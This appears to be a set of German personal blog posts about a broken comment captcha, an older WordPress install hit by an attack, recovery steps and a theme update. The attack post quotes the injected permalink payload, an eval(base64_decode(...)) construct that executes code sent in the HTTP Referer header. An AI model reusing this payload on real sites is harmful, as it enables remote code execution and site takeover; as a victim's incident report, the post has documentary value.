Hätte mir ja auch mal vorher jemand sagen können, dem Admin fällt sowas ja nicht auf 
Beim Eingeben des Captchas zum Kommentieren wurde auch bei richtiger Eingabe die Meldung “Invalid Code” ausgegeben und ein neuer Code wurde generiert. Endlos-Schleife.
Ich habe das Plugin vorerst deaktiviert in der Hoffnung, dass Akismet Spam-Kommentare solange zuverlässig abfängt.
Traurig aber wahr: es hat den Anschein, dass mein kleines Blog am Mittwoch um 2:16 Uhr morgens Opfer einer Attacke wurde. Es begann mit der Registrierung eines Benutzers namens “MikeWink”. Danach hatten alle Links im Blog ein Anhängsel in der Form
http://www.example.com/posttitle/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
Der Browser reagiert für jeden Klick auf jeden beliebigen Link mit “Internal Server Error 500″. Man konnte im Blog also nicht mehr navigieren (jeder Link war wie oben beschrieben manipuliert), sondern nur noch die Startseite aufrufen. Bemerkt habe ich den Zustand Donnerstag nachmittag und direkt behoben, indem ich “einfach” im Admin Panel die Permalink-Struktur wieder zurückgesetzt habe auf meinen Standard (dort war der o.g. Code einfach hinzugefügt worden, wie auch immer das geht.
Die Attacke nutzte wohl eine Schwäche in der WordPress-Version 2.7.1, die ich deswegen noch nicht geupdated hatte, weil von Problemen mit dem 2.8.x-Strang berichtet wurde. Lesenswerte Details finden sich beim Fiesen Admin.
MIttlerweile habe ich das Problem oberflächlich behoben, meint: neue Passwörter für Datenbank, FTP, Admin-Bereich. Allerdings scheint der Hack tiefer in die Datenbank zu reichen und hier -Asche auf mein Haupt- ist das letzte Backup von April diesen Jahres, weil still und unbemerkt das Backup-Plugin nach dem Update auf 2.7.1 aufgehört hat, wöchentlich Mail mit einem Backup im Anhang zu schicken. Und da diese Mails automatisch wegsortiert und als “gelesen” marktiert werden… (Update: Lucky Bastard! Sie wurden von da an nur auf einen Ordner auf dem Server gespeichert, statt sie zu verschicken 
)
Es ist doch zum ko**** mit diesen scheiß Hackern bzw. hier eher SkriptKiddies, warum können die nicht einfach irgendwo hingehen und sterben?
Interessant. Das hat in meinem Blog funktioniert, obwohl die Benutzerregistrierung schon vorher deaktiviert war…
Ja, ihr habt richtig gesehen, nach langer Zeit habe ich mich dazu durchringen können, das ganze Blog mal wieder grundlegend zu updaten. Und da ich keine Lust auf die Nummer “Kopie der Datenbank und der Dateien > Lokaler Server > Änderungen > Zurückspielen auf den Server > Feststellen, dass nix mehr geht” hatte, müssen meine armen Leser als Beta-Tester herhalten.
Jetzt läuft Wordpress auf Version 2.33 und das neue Theme ist das iTheme. Finde ich schick und passt zum Blog.
Also: wenn irgendwas nicht geht, insbesondere in der Benutzung, dann bitte meckern, hier in den Kommentaren oder via Kontakt-Funktion. Danke für Hinweise schonmal vorab!
Ich habe über zwei Jahre an dem alten Theme gebastelt, gemacht und getan, da ist bei diesem Update sicher einiges im Argen und leider bin ich kein Profi, nichtmal ein Semi-Profi, so dass jeder kleine Mist mühseliges Code-Gefrickel für mich bedeutet… es wird also dauern, aber irgendwann wird alles gut